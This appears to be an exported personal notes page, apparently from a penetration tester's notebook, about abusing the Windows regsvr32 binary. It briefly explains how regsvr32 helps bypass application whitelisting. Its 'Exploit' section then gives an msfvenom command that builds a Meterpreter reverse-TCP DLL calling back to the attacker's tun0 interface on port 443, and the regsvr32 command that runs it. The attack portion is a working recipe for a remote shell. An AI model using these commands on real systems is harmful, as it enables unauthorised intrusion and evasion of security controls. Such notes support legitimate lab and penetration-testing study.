<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>regsvr32</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>regsvr32</h1>

      <div class="ck-content">
        <p>Regsvr32 is a Microsoft command-line tool to register and unregister Dynamic
          Link Libraries (DLLs)  in the Windows Registry. The regsvr.exe binary is
          located at:</p>
        <ul>
          <li>C:\Windows\System32\regsvr32.exe for the Windows 32 bits version</li>
          <li>C:\Windows\SysWOW64\regsvr32.exe for the Windows 64 bits version</li>
        </ul>
        <p>The technique used in the <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">regsvr32.exe</span> uses
          trusted Windows OS components and is executed in memory, which is one of
          the reasons why this technique is also used to bypass application whitelisting. </p>
        <p>Exploit:</p>
        <p>Create a malicious dll with:</p><pre><code class="language-text-plain">msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f dll -a x86 -o living.dll </code></pre>

        <p>transfer it to host, and run it with:</p><pre><code class="language-text-plain">c:\Windows\System32\regsvr32.exe living.dll</code></pre>
      </div>
    </div>
  </body>

</html>